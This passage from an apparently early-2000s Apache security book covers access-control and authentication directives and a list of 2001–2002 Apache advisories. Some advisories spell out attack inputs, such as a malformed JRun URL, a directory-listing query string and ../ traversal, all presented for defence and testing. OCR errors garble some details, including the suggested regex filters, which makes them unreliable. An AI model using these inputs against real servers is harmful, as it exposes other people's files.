e require—The require directive specifies which users or groups can access the 
password-protected directory. Valid choices are explicitly named users, explic- 
itly named user groups, or any valid user in . htpasswd. In the previous 
example, the require directive limits access to user nicole (require user 
nicole). 


e allow—The allow directive controls which hosts can access the password- 
protected directory. Syntax is allow from host? host2 host3. You can specify 
these hosts by hostname, IP address, or partial IP addresses. 


e deny—The deny directive specifies which hosts are prohibited from accessing 
the password-protected directory. Syntax is deny from host? host2 host3. 
Again, you can specify hosts by their fully qualified hostnames, IP addresses, or 
partial IP addresses. 


e order—the order directive controls the order in which the server will evaluate 
access rules. Syntax is deny, allow (deny rules are processed first), or allow, 
deny (allow rules are processed first). 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


mod_auth_anon 


mod_auth_anon provides anonymous user management, and lets you specify if, how, 
and where anonymous users gain entry to password-protected directories. 


mod_auth_anon supports six directives: 


e Anonymous—The Anonymous directive, included in mod_auth_anon, grants anony- 
mous users access to password-protected areas. See the Anonymous section 
earlier in this appendix or Chapter 11 for more information. 


e Anonymous_Authoritative—The Anonymous_Authoritative directive, when set 
to on, denies access to all but anonymous users or user IDs. See the 
Anonymous_Authoritative section earlier in this appendix or Chapter 11 for 
more information. 


e Anonymous_LogEmail—Anonymous_LogEmail, when set to on, logs passwords 
that anonymous users provide to error_log. See the Anonymous_LogEmail 
section earlier in this appendix or Chapter 11 for more information. 


e Anonymous_MustGiveEmail—The Anonymous_MustGiveEmail directive, when set 
to on, requires anonymous users to supply their e-mail addresses as passwords. 
See the Anonymous_MustGiveEmail section earlier in this appendix or Chapter 
11 for more information. 
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e Anonymous_NoUserID—The Anonymous_NoUserID directive, when set to on, 
allows users access without supplying a user ID. See the Anonymous_NoUserID 
section earlier in this appendix or Chapter 11 for more information. 


e Anonymous_VerifyEmail—Anonymous_VerifyEmail, included in when set to on, 
instructs Apache to verify—or try to verify—that visitors supply a valid e-mail 
address. See the Anonymous_VerifyEmail section earlier in this appendix or 
Chapter 11 for more information. 


mod_auth_db 


mod_auth_db provides user authorization through Berkeley DB (instead of DBM) files. 
mod_auth_db’s directives are as follows: 


e AuthDBGroupFile—The AuthDBGroupFile directive lets you specify a file that 
contains group authorization information. 


e AuthDBUserFile—The AuthDBUserFile directive lets you specify the DB file’s 
name. Such files contain username/password pairs for use in DB-based authen- 
tication. See the AuthDBUserFile section earlier in this appendix or Chapter 11 
for more information. 


e AuthDBAuthoritative—The AuthDBAuthoritative directive lets you specify 
whether Apache can pass authorization procedures to lower-level modules 
instead of using simple DB-based authentication. See the AuthDBAuthoritative 
section earlier in this appendix or Chapter 11 for more information. 


mod_auth_dbm 


mod_auth_dbm provides user authorization through DBM files. mod_auth_dbm’s direc- 
tives are as follows: 


e AuthDBMAuthoritative—The AuthDBMAuthoritative directive lets you specify 
whether Apache can pass authorization procedures to lower-level modules 
instead of using simple DBM-based authentication. See the 
AuthDBMAuthoritative section earlier in this appendix or Chapter 11 for more 
information. 


e AuthDBMGroupFile—The AuthDBMGroupFile directive lets you specify a file that 
contains group authorization information. See the AuthDBMGroupFile section 
earlier in this appendix or Chapter 11 for more information. 


e AuthDBMUserFile—The AuthDBMUserFile directive lets you specify the DB file’s 
name. Such files contain username/password pairs for use in DBM-based 
authentication. See the AuthDBMUserFile section earlier in this appendix or 
Chapter 11 for more information. 
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mod_auth_digest 


mod_auth_digest provides authentication through use of message digest algorithms. 
Currently, above and beyond Basic-type authentication, Apache supports digest- 
based cryptographic authentication using MD5. MDS belongs to a family of one-way 
hash functions called message digest algorithms, and was originally defined in RFC 
1321: 


The algorithm [MD5] takes as input a message of arbitrary length and produces as output a 
128-bit “fingerprint” or “message digest” of the input. It is conjectured that it is computa- 
tionally infeasible to produce two messages having the same message digest, or to produce 
any message having a given prespecified target message digest. The MD5 algorithm is 
intended for digital signature applications, where a large file must be “compressed” in a 
secure manner before being encrypted with a private (secret) key under a public-key 
cryptosystem such as RSA. 


NOTE 
RFC 1321 is located at http://www. thefrog.com/source/rfc1321.txt. 


Apache provides digest authentication through the htdigest system. htdigest—the 
main application in the digest scheme—works in a similar fashion as htpasswd. 
Using it, you create a new digest database (.htdigest). Once you specify your rules 
for digest authentication, all further authentications will be digest-based. 


mod_auth_digest supports the following directives: 


e AuthDigestAlgorithm—The AuthDigestAlgorithm directive allows you to 
specify the hash algorithm to be used. Currently, the choices are MD5 and 
MD5S-sess (although, Apache documentation reports that MD5S-sess is not yet 
fully supported). 


e AuthDigestDomain—The AuthDigestDomain directive lets you specify one or 
more domains that share realm, username, and password information for use 
in digest authentication. 


e AuthDigestFile—The AuthDigestFile directive lets you specify the file that 
contains access control lists for use in digest authentication. 


e AuthDigestGroupFile—The AuthDigestGroupFile directive lets you specify the 
file that contains groups and users within those groups that are subject to 
digest authentication. 


e AuthDigestNcCheck—The AuthDigestNcCheck is not yet implemented. 
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e AuthDigestNonceFormat—The AuthDigestNonceFormat directive is not imple- 
mented yet. 


e AuthDigestNonceLifetime—The AuthDigestNonceLifetime directive is not 
implemented yet in 2.0. 


e AuthDigestQop—The AuthDigestQop directive lets you specify the depth of 
digest protection for sessions. For example, this can be simply username/pass- 
word authentication, or Apache can apply MDS session integrity checking, too. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


mod_auth_ldap 


mod_auth_ldap authenticates clients via user entries in a Lightweight Directory 
Access Protocol (LDAP) directory. mod_auth_ldap supports the following directives: 


e AuthLDAPAuthoritative—The AuthLDAPAuthoritative directive lets you specify 
if Apache can pass authorization procedures to lower-level modules instead of 
using simple LDAP-based authentication. 


e AuthLDAPBindDN—The AuthLDAPBindDN directive lets you set an optional distin- 
guished name when binding to the server. 


e AuthLDAPBindPassword—The AuthLDAPBindPassword lets you set a bind pass- 
word for the bind distinguished name. 


e AuthLDAPCompareDNOnServer—The AuthLDAPCompareDNOnServer forces an 
authoritative comparison of the server DN and the remote-specified DN. 


e AuthLDAPDereferenceAliases—The AuthLDAPDereferenceAliases directive 
specifies when mod_auth_ldap will de-reference aliases during LDAP operations. 


e AuthLDAPEnabled—The AuthLDAPEnabled directive lets you incisively specify— 
within your directory tree—which directories should or shouldn’t use LDAP. 


e AuthLDAPFrontPageHack—The AuthLDAPFrontPageHack directive accommodates 
FrontPage-centric user/group files that, under ordinary conditions, interfere 
with LDAP authentication and, in certain cases, break it. 


e AuthLDAPGroupAttribute—The AuthLDAPGroupAttribute directive specifies 
which LDAP attributes Apache should use to evaluate group membership. 


e AuthLDAPGroupAttributeIsDN—The AuthLDAPGroupAttributeIsDN informs 
Apache to use the distinguished name of the client username when checking 
for group membership. 
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e AuthLDAPRemoteUserIsDN—If the AuthLDAPRemoteUserIsDN directive is enabled, 
Apache will set the REMOTE_USER environment variable to the full distinguished 
name of the authenticated user. 


e AuthLDAPStartTLS—If the AuthLDAPStartTLS directive is set, mod_auth_ldap 
establishes a secure TLS session after connecting to the LDAP server. 


e AuthLDAPUr1—The AuthLDAPUr1 directive stores an RFC 2255 URL that articu- 
lates what LDAP parameters to use. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


mod_cgi 


mod_cgi provides Common Gateway Interface program execution. The Common 
Gateway Interface (CGI) is a standard that specifies how Web servers use external 
applications to pass dynamic information to Web clients. 


mod_cgi supports the follow directives: 


e ScriptLog—The ScriptLog directive lets you specify the CGI script error 
logfile. 


e ScriptLogLength—The ScriptLogLength directive lets you limit the CGI error 
log’s size. 


e ScriptLogBuffer—The ScriptLogBuffer directive lets you limit PUT and POST 
entity bodies to a particular size, thus preventing them from flooding your log. 


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_cgid 

mod_cgid provides CGI program execution. mod_cgid eliminates the need for internal 
forking on Unix systems that can’t afford the overhead. mod_cgid accomplishes this 
by establishing an external daemon that handles forking, thus shifting the load from 
Unix. 


mod_cgid supports the following directives: 


e ScriptLog—The ScriptLog directive lets you specify the CGI script error 
logfile. 


e ScriptLogLength—The ScriptLogLength directive lets you limit the CGI error 
log’s size. 
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e ScriptLogBuffer—The ScriptLogBuffer directive lets you limit PUT and POST 
entity bodies to a particular size, thus preventing them from flooding your log. 


e ScriptSock—The ScriptSock directive lets you specify the CGI daemon’s 
socket’s name. 


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_env 


mod_env handles the passing of environment variables to CGI programs and Server- 
Side includes (SSI). 


mod_env supports the following directives: 


e PassEnv—The PassEnv directive will pass one or several environment variables 
to CGI or SSI from the httpd invoker’s shell. 


e SetEnv—The SetEnv directive statically sets an environment variable before 
Apache passes it to CGI or SSI. 


e UnsetEnv—The UnsetEnv directive prunes one or several environment variables 
from the list that will subsequently pass to CGI or SSI. 


Learn more in Chapter 4, “Environmental Hazards: Apache and Your Operating 
System.” 


mod_include 


mod_include provides Server-Side Include (SSI) support, a system that allows 
Webmasters to include on-the-fly information in HTML documents without actually 
writing CGI programs. 


SSI does this using HTML-based directives. These are commands that you embed in 
HTML documents. When Web clients request such documents, Apache parses and 
executes those commands. 


Here’s an example using the config timefmt directive that reports time and date: 


<html> 

The current date and time is: 
<!--#config timefmt="%B %e %Y"--> 
</html> 
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When a Web browser calls this document, the server will capture the local host’s 
date and time and output the following: 


The current date and time is: 
Monday, 14-Jun-99 11:47:37 PST 
Similarly, SSI allows you to cleanly include additional HTML documents into the 


final output, such as headers and footers. 


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_log_config 
mod_log_config provides Apache logging capabilities and supports four directives: 


e CookieLog—The CookieLog directive lets you specify the cookie log filename. 
Apache will log cookie data to this file. 


e CustomLog—The CustomLog directive lets you set a log filename, a log format, 
and a conditional environment variable for logging. 


e LogFormat—The LogFormat directive lets you specify what data Apache should 
log and how to format it. 


e TransferLog—tThe TransferLog directive lets you specify the name of a file 
that Apache will echo user access logs to. 


Learn more in Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


mod_suexec 


mod_suexec provides support for running CGI scripts as a specified User and Group. 
This eliminates many CGI security issues, for it enables you to more incisively 
control script permissions. 


Syntax is: 

SuexecUserGroup user group 

user is whatever username you specify (and this must be a valid user). group is what- 
ever group you specify. 


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_unique_id 


mod_unique_id provides an environment variable ($UNIQUE_ID) with a unique identi- 
fier for each request. This permits machines (and humans in certain instances) to 
ascertain which host and which httpd process generated a specific request. If you 
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load mod_unique_id, Apache will fill in $UNIQUE_ID with a unique value composed of 
a 19-character value composed of a 32-bit IP address, a 32-bit pid, a 32-bit time 
stamp, and a 16-bit counter. For more information, see Chapter 12, “Hacking Secure 
Code: Apache at Server Side.” 


mod_user_track 


mod_user_track provides tracking of user preferences and behavior through cookies. 
Once called the cookie module, mod_user_track’s directives are as follows: 


e CookieDomain—The CookieDomain directive lets you specify the domain to 
which set cookies apply. See the CookieDomain section earlier in this appendix 
or Chapter 11. 


e CookieExpires—The CookieExpires directive lets you specify the time when a 
cookie expires. CookieExpires offers wide latitude, allowing you to set the time 
in seconds, minutes, hours, weeks, months, or years. See the CookieExpires 
section earlier in this appendix or Chapter 11. 


e CookieName—The CookieName directive lets you specify a cookie’s name (the 
default is Apache). See the CookieName section earlier in this appendix or 
Chapter 11. 


e CookieStyle—The CookieStyle directive lets you specify the style of cookie to 
set, such as Netscape, RFC 2109, or RFC 2965. See the CookieStyle section 
earlier in this appendix or Chapter 11. 


e CookieTracking—The CookieTracking directive lets you specify whether 
Apache should perform cookie tracking (and generate a cookie for each new 
client request). See the CookieTracking section earlier in this appendix or 
Chapter 11. 


PassEnv 


The PassEnv directive, available in mod_env, will pass one or several environment 
variables to CGI or SSI from the httpd invoker’s shell. 


Syntax is: 


PassEnv environment -variable 


environment -variable, in this case, is any shell environment variable, including but 
not limited to BASH, BASH_ENV, BASH_VERSION, COLUMNS, EUID, HISTFILE, 
HISTFILESIZE, HISTSIZE, HOME, HOSTNAME, HOSTTYPE, IFS, INPUTRC, LANG, 
LD_LIBRARY_PATH, LOGNAME, MAIL, MAILCHECK, OPTERR, OPTIND, OSTYPE, PATH, PPID, PS1, 
PS2, PS4, PWD, QTDIR, SHELL, SHLVL, TERM, UID, USER, or USERNAME. 
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Learn more in Chapter 4, “Environmental Hazards: Apache and Your Operating 
System.” 


PidFile 
The PidFile directive lets you specify a file that stores httpd’s process ID. 
Syntax is: 


PidFile filename 


Note that filename is relative to ServerRoot, unless you precede it by a slash. 


ProxyBlock 


The ProxyBlock directive lets you specify a list of words, hosts, or domains that the 
proxy server will block. 


Syntax is: 


ProxyBlock state 


state can be one of four things: 
e *—Block all sites 
e word—Block hosts whose hostnames contain the word 
e host—Block the specified host 


e domain—Block the specified domain 


ProxyDomain 


The ProxyDomain directive specifies the default domain that the Apache proxy server 
will belong to. 


Syntax is: 
ProxyDomain domain 


domain is generally a single domain, which you specify by its root hostname, 
preceded by a dot: .foo.com. 


ProxyReceiveBufferSize 


The ProxyReceiveBufferSize directive, included in mod_proxy, lets you define the 
network buffer size for outgoing HTTP and FTP connections. 
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Syntax is: 


ProxyReceiveBufferSize size 


size is the explicit size you specify (for example, 2048). 


ProxyRemote 


The ProxyRemote directive, included in mod_proxy, lets you define remote proxies to 
the local host (which functions as a proxy). 


Syntax is: 


ProxyRemote match remote-server 


remote-server here is a declaration with three tiers: 


e protocol—tThis defines the protocol. Only HTTP is supported, but Apache can 
perform FTP transfers via HTTP. 


e hostname—The remote proxy’s hostname (www. foo.com). 


e port—tThe port on which to communicate with the remote host. 


For example: 


ProxyRemote ftp http://host2.com:8080 


This defines the protocol (ftp), the hostname (host2.com) and the port (8080). 


ProxyRequests 


The ProxyRequests directive, included in mod_proxy, enables or disables Apache as a 
proxy server. 


Syntax is: 


ProxyRequests state 


state is on (enable Apache as a proxy server) or off (don’t). 


ProxyVia 


The ProxyVia directive, included in mod_proxy, lets you control proxy request flow, 
and whether Apache generates or passes on RFC 2058 Via headers. 
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Options are 


e Block—Here, Apache removes all proxy Via headers. 


Full—tThis appends your Apache version to each successive proxy Via header. 


Off—this is the default. Apache does nothing. 


e On—Here, Apache generates a new Via header for each new request. 


Syntax is: 


ProxyVia On | Off | Full | Block 


ServerAdmin 


The ServerAdmin directive, included as a core feature, lets you specify your adminis- 
trative e-mail address. Apache displays this address to clients in error or other admin- 
istrative messages. 


Syntax is: 


ServerAdmin email-address 


email -address is whatever address you specify. Typical examples are 
webmaster@foo.com, root@foo.com, problems@foo.com, and so forth. It’s probably 
wise to dedicate an address expressly for this purpose (and not specify a common 
address that you regularly use for mail), because users that use it will invariably refer 
to problems restricted solely to your Apache server (and not your mail, DNS, or other 
daemons). This is an especially good idea if you have high traffic. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerAlias 


The ServerAlias directive, included as a core feature, identifies your server by its 
name or domain name or, in certain situations, by its IP address. 


Syntax is: 
ServerAlias name 
name is one name or several that you specify. ServerAlias handles multiple host- 


names in virtual host configurations. To learn more, see Chapter 8, “Overlording 
Apache Server: General Administration.” 
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ServerName 


The ServerName directive, included as a core feature, identifies your server by its 
name or domain name or, in certain situations, by its IP address. 


Syntax is: 

ServerName name 

name is whatever name you specify (for example, www. foo.com). ServerName works 
not merely on the system’s default site, but also any virtual hosts you administrate 
with Apache. Several significant security and administrative issues arise with 


ServerName’s use, depending on how you configure your DNS (or if you don’t have 
locally-managed DNS). 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerPath 


The ServerPath directive, included as a core feature, sets the URL path name for a 
name-based virtual host. This supports legacy clients that don’t properly handle 
name-based virtual hosts. 


Syntax is: 


ServerPath path 


path is any directory path you specify. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerRoot 


The ServerRoot directive, included as a core Apache feature, lets you specify where 
the root Apache directory resides. This directory stores Apache’s configuration files. 
In default installations (for example, in 1.3), this was historically /etc/httpd. When 
you assign this directory, take care. It should be a secured directory, and one that 
carries sufficiently stringent permissions. 


Syntax is: 

ServerRoot path 

path is the directory path you specify. Currently (in 2.0), the default is 
/usr/local/apache. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
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ServerSignature 


The ServerSignature directive, included as an Apache core feature, enables you to 
specify a trailing footer that identifies your server or reflects your server's identity. 
ServerSignature supports three arguments: 


e off—The default; this issues no trailing footer. 


e On—Enabled; this issues Apache version and the ServerName value (your 
server’s name). 


e Email—Here, you specify an administrative e-mail address. 


Syntax is: 


ServerSignature state email-option 


Since Off is the default, you have two choices: 
1. ServerSignature On—An identifying trailing footer only 


2. ServerSignature On Email—An identifying trailing footer, plus your adminis- 
trative e-mail address 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


User 


The User directive sets Apache’s user ID (UID), or the user under which Apache will 
answer client requests. Never set this to root. Typically, in default installations this 
value is user nobody. 


Syntax is: 

User userid 

userid is whatever user you specify. For example, to set this value to nobody, you’d 
configure User like this 


User nobody 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


UserDir 


The UserDir directive, included in mod_userdir, sets the directory from which 
Apache pulls user-owned documents. UserDir thus enables you to specify where 
users must store their documents to make them visible to remote clients. 
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Traditionally, the directory was public_html (and in versions earlier than 1.1, this 
was your only option). That is, to make their documents remotely accessible, users 
had to create a directory within their home directory named public_html: 


/home/samshacker/public_html 
This would make user samshacker’s documents available at the URL 


http://www. foo.com/~samshacker/, even though internally, these documents resided 
in /home/samshacker/public_html. 


Today, UserDir lets you establish this user-specific directory anywhere—and therein 
lies trouble. Choose this directory with caution, ensuring that it carries sufficiently 
stringent permissions. 


Syntax is: 


UserDir directory 


directory is whatever directory you specify. 


UserDir also supports the keywords enabled and disabled. You use these to specify a 
particular user or list of users for which requests can or cannot work. For example, 
Apache documentation has long recommended this option, to prevent remote 
clients from pulling documents in any root-owned directory: 


UserDir disabled root 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


B 
Apache Security 


Advisories and Bugs 


This appendix summarizes recent Apache security and 
administrative issues. 


Apache Security Issues 


This section lists serious security issues from April 2001 to 


January 2002. 


Win32 PHP.EXE Remote File Disclosure 


Date: 
Source: 


Versions: 


Description: 


Fix: 


References: 


January 4, 2002 
Paul Brereton 


Apache 1.3.11win32, 1.3.11, 1.3.12win32, 
1.3.12, 1.3.13win32, 1.3.14win32, 1.3.14, 
1.3.15win32, 1.3.16win32, 1.3.17win32, 
1.3.17, 1.3.18win32, 1.3.18, 1.3.19win32, 
1.3.19, 1.3.20win32, 1.3.20, and 1.3.22, plus 
W2K, Win98 


Win32’s PHP.EXE allows remote attackers to 
view arbitrary files and, in some cases, launch 


executables. 
Unknown 


http://www. securiteam.com/ 
windowsnt focus /5ZP030U60U.htm1 
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zml.cgi File Disclosure 


Date: 
Source: 
Versions: 


Description: 


Fix: 


References: 


December 31, 2001 
blackshell@hushmail.com 
Abe Timmerman’s zml.cgi 


zm1.cgi is a Perl-based CGI script that handles Server-Side Includes (SSI). 
Find it at http: //ww.jero.cc/zm1/test.zml. The script takes a file name 
argument but fails to stringently filter that argument. Hence, attackers can 
send a strand of ../ directives, and the script processes these and returns 


whatever files attackers request. 
Unknown (though you could filter . . / submissions) 


http://www. securityfocus.com/archive/1/247742 


Last Lines Directory Traversal Vulnerability 


Date: 
Source: 


Versions: 


Description: 


Fix: 


References: 


December 30, 2001 

BrainRawt 

Matrix’s CGI Vault “Last Lines” 2.0 and Apache 1.3.17, 1.3.18, 1.3.19, 
1.3.20, and 1.3.22 


Last Lines CGI is a free, Perl-based CGI tool from Matrix’s Vault. It prints x 
number of lines from a specified log file to a specified Web page. The script 
doesn’t filter metacharacters properly and therefore allows remote users to 


examine any Web-readable directory. 


None yet, but you can hack a metacharacter filter like this: s/[*a-zA-Z0-9\ - 


=_]//;. This replaces any metacharacters with whitespace. 


http://www. securityfocus.com/archive/1/247710 


Last Lines Remote Command Vulnerability 


Date: 
Source: 


Versions: 


Description: 


December 30, 2001 
BrainRawt 


Matrix’s CGI Vault “Last Lines” 2.0 and Apache 1.3.17, 1.3.18, 1.3.19, 
1.3.20, and 1.3.22 


Last Lines CGI is a free, Perl-based CGI tool from Matrix’s Vault. It prints x 
number of lines from a specified log file to a specified Web page. The script 
doesn’t filter metacharacters properly and therefore allows remote users to 


execute arbitrary commands sent through a Web browser. 


Fix: 


References: 
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None yet, but you can hack a metacharacter filter like this: 
s/[*a-ZA-Z0-9\-=_]//;. This replaces any metacharacters with whitespace. 


http://www. securityfocus.com/archive/1/247710 


Oracle 9i PL/SQL Apache Module Buffer Overflow 


Date: 
Source: 
Versions: 


Description: 


Fix: 


References: 


December 20, 2001 

David Litchfield 

Oracle 9iAS 

Oracle 9iAS ships with a PL/SQL Apache module that provides Database 


Access Descriptors (DAD) management facilities. 
Oracle Patch 2128936; http: //metalink.oracle.com/ 


http://otn.oracle.com/deploy/security/pdf/modplsql.pdf 


JRun Malformed URL Vulnerability 


Date: 
Source: 
Versions: 


Description: 


Fix: 


References: 


November 27, 2001 
George Hedfors 
Allaire JRun 3.0 and 3.1 


JRun is a Java application server that deploys JSP, Java Servlets, EJB, JTA, and 
JMS. Attackers can subvert JRun’s security by issuing a malformed URL. 
Results vary, but reports indicate that attackers can obtain access to protected 
files, including ASP source files. This is not an Apache issue. Researchers 
thought this was restricted to exclusively IIS-based sites. However, some 
researchers suggest that Apache systems running JRun could be vulnerable. 
Try this attack on your own system. The URL to send is 

http://www. targethost.net/%<3f.jsp. 


http: //www.macromedia.com/v1/handlers/ 
index.cfm?ID=22262&Method=Full 


Allaire/Macromedia advisory MPSB0O1-13: http: //www.cgisecurity.com/ 


archive/misc/Jrun_dir_browsing_hole.txt 


Apache Directory Index Exposure 


Date: 


November 27, 2001 


Apache Report No: N/A 
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Source: 


Versions: 


Description: 


Fix: 


References: 


Kevin (and the Mandrake Security Team) 


Apache 1.3.11, 1.3.14, EnGarde Secure Linux 1.0.1, Mandrake 7.1, 
Mandrake 7.2, MandrakeSoft Single Network Firewall 7.2, Apache 
1.3.17, MandrakeSoft Corporate Server 1.0.1, Mandrake 8.0, Mandrake 
8.0 ppc, OpenBSD 2.8, SuSE 7.1, Apache 1.3.18, Apache 1.3.19; Mac 
OS X 10.0.3, Caldera eDesktop 2.4, Caldera eServer 2.3.1, OpenLinux 
2.4, Debian 2.3, TRU64UNIX 4.0f, TRU64UNIX 4.0g, TRU64UNIX 5.0, 
FreeBSD 3.5.1, FreeBSD 4.2, HP-UX 10.20, HP-UX 11.0, HP-UX 11.11, 
Mandrake 7.1, Mandrake 7.2, Mandrake 8.0, Mandrake 8.1, NetBSD 
1.5, NetBSD 1.5.1, OpenBSD 2.8, OpenBSD 2.9, Red Hat 6.2, Red Hat 
7.0, Red Hat 7.1, SuSE 6.4, SuSE 7.0, SuSE 7.1, SGI IRIX 6.5.8, SGI IRIX 
6.5.9, Solaris 7.0, Solaris 8.0, 1.3.20, and Red Hat Secure Web Server 
3.2 i386 


Under certain circumstances, due to a flaw in Apache’s content negotia- 
tion, attackers can obtain directory indexes—even when you insert a 
default index file (index.html, index.htm, index.php, home.htm, and 


so on) in the specified directory. 
Upgrade 


See the message with the subject “How Google indexed a file with no 


external link” at http://www. securityfocus.com/archive/1/195833 


Malicious Webmaster File Extension Spoofing 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


November 26, 2001 
N/A 

Jouko Pynnonen 

All versions 


Occasionally, the issue is more what Web sites can do to visitors than 
what visitors can do to Web sites. This is one such case. It affects MSIE 
5.5 and 6.0. Webmasters can force IE to download executable files 
named with any extension (for example, *.txt), thus fooling Windows 
into opening programs that remote users wouldn’t otherwise wittingly 
open. Through this mechanism, Apache administrators can run mali- 
cious code on visitors’ machines. To see the exploit (which offers 
endless possibilities) in action, check SecurityFocus at 

http://www. securityfocus.com/cgi-bin/vulns - 


item.pl?section=exploit&id=3597. 


Fix: 


References: 
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See the reference URL; Microsoft issued a patch. 


http: //www.microsoft.com/technet/security/bulletin/MSQ1 - 


058.asp?frame=true 


Stronghold File System Disclosure 


Date: 
Apache Report No: 
Source: 


Versions: 


Description: 


Fix: 


References: 


November 23, 2001 
N/A 
Madalina Andrei, Reda Zitouni 


Apache/1.3.19, mod_perl/1.25, mod_ssl/2.8.1, OpenSSL/0.9.6, 
PHP/3.0.18, Stronghold 2.3, 2.4, 3.0 


Stronghold is a secure Apache implementation from Red Hat. (Learn 
more about Stronghold at 

http://www. redhat.com/software/Apache/stronghold/). The default 
installation creates two URLs at which administrators can view server 
status (/stronghold-info and /stronghold-status). Outsiders can see 
these URLs. 


Disallow access from any domain but yours. 


http://www. securityfocus.com/archive/1/241952 


mod_user_track Predictable ID Generation Flaw 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


November 7, 2001 

N/A 

David Endler 

Apache 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20 


mod_user_track is a module that provides tracking of user preferences 
and behavior through cookies. Session IDs that mod_user_track gener- 
ates consist of a client’s IP, the system time, and the server PID. As such, 
they aren’t random, anyone can generate them, and anyone can use 
them to impersonate other users. Therefore, don’t build applications 
that rely on them. To learn more about mod_user_track, see Appendix 
A, “Apache Security-Related Modules and Directives,” or see Chapter 
11, “Apache and Authentication: Who Goes There?” 
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Fix: 


References: 


Unknown, but not required. Do not build applications that rely on these 


values for authentication. 


Brute-Forcing Web Session IDs by David Engler (PDF), which you'll find at 


http: //www.idefense.com/papers. html 


MultiViews Query String Vulnerability 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


Fix: 


References: 


October 29, 2001 

8628 

lain Truskett 

1.3.22 and perhaps earlier 


When affected versions negotiate a URI via MultiViews, they discard CGI 
query strings. In some cases, attackers can force a directory listing by 
sending a query string of M=D. 

Unknown 


http: //bugs.Apache.org/index.cgi/full/8628 


NAI PGP Keyserver Administrative Interface DoS 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


Fix: 


References: 


September 28, 2001 

N/A 

Nobuo Miwa 

PGP Keyserver 7.0 and 7.0.1 


You might not use NAI PGP Keyserver, but many Webmasters do. If you 
do, take note: Affected versions allow an attacker to deny legitimate 
users service by sending custom-crafted URLs. Moreover, in some 
instances, remote attackers can turn the service on and off. This is a 


permission problem, not an internal software flaw. 


Change network permissions to disallow remote users access to the 


service. 


http: //www.pgp.com/support/product -advisories/keyserver.asp 


H-Sphere File Disclosure 


Date: 


Apache Report No: 


September 25, 2001 
N/A 


Source: 


Versions: 


Description: 


Fix: 


References: 
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Crazy Einstein 


H-Sphere 1.5 + Apache 1.3.9, IIS 5.0; H-Sphere 2.06 + Apache 1.3.9, IIS 
5.0; H-Sphere 2.05 + Apache 1.3.9, IIS 5.0; H-Sphere 2.0 + Apache 
1.3.9, IIS 5.0 


H-Sphere is a front end for automating Web hosting operations, includ- 
ing billing, e-mail, Web, FTP, DNS, POP3, cgi-bin, WebMail, and 
FrontPage configuration. Apparently, it doesn’t filter . / sequences, 
leading to file disclosure when attackers enter the correct combination. 


(In other words, anyone with a Web client can exploit this weakness.) 


Unknown. The engine at http: //www.psoft.net/ contains no info on 
it, nor does the Positive Software forum or archive—not that | can find, 
anyway. Presumably, though, an upgrade would solve the problem. 
Positive Software must be aware of this issue, so | assume that its devel- 


opment team is addressing it now. 


http://www. securityfocus.com/cgi-bin/vulns - 
item.p1?section=info&id=3359 


Log File Vulnerability 


Date: 

Apache Report No: 
Source: 

Versions: 


Description: 


Fix: 


References: 


September 22, 2001 
7848 

Daniel Matuschek 
1.3.20 and earlier 


Attackers can connect to a virtual host on an Apache system that uses 
split-logfile and, using a specially crafted URL that precedes the 
target address with a slash, overwrite or append to log files. In so doing, 


attackers can erase bona fide log evidence or fabricate false evidence. 
Upgrade to 1.3.22. 


Conectiva Linux security advisory at http://www. linuxsecurity.com/ 
advisories/other_advisory-1645.htm1 or the Apache Bug Database 
at http: //bugs.Apache.org/index.cgi/full/7848 


Oracle 9i Path Disclosure 


Date: 


Apache Report No: 


September 17, 2001 
N/A 
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Source: 


Versions: 


Description: 


Fix: 


References: 


KK Mookhey 


Oracle 9i Application Server, Compaq Tru64 4.0g, 5.0, 5.0a, 5.0f, 5.1; 
7.0, 7.2, 7.4, 7.6, 7.8, 8.0, 8.1, 8.2, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 
9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10, 10.0, 10.01, 10.1, 10.8, 10.9, 
10.10, 10.16, 10.20, 10.26, 10.30, 10.34, 11.0, 11.04, and 11.11; 


AIX 1.2.1, 1.3, 2.2.1, 3.0x, 3.1, 3.2, 3.2.4, 3.2.5, 4.0, 4.1, 4.1.1, 4.1.2, 
4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3, 4.3.1, 4.3.2, 4.3.3, and 5.1; 2000, 
2000 SP1, 2000 SP2, NT 4.0, NT 4.0SP1, NT 4.0SP2, NT 4.0SP3, NT 
4.0SP4, NT 4.0SP5, and NT 4.0SP6a; Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 
1.1.3_U1, 1.1.4, 1.1.4-JL, 1.2, 2.0, 2.1, 2.2, 2.3, 2.4, 2.4_x86, 2.5, 

2.5 x86, 2.5.1, 2.5.1_x86, 2.6, 2.6_x86, 2.6_x86HW3/98, 
2.6_x86HW5/98, 2.6HW3/98, 2.6HW5/98, 7.0, 7.0_x86, 8.0, and 
8.0_x86 


Oracle 9i Application Server ships with Apache and a Java engine for 
JSP/servlets. Learn more about Oracle Application Server at 
http://www.oracle.com/ip/ (right below the sentence that in strong 
and bold solemnly declares Only Oracle9i Is Unbreakable). When attack- 
ers send a request for a JSP file that doesn’t exist, Oracle9i reveals inter- 
nal Web paths. It throws a javax.servlet.ServletException message 
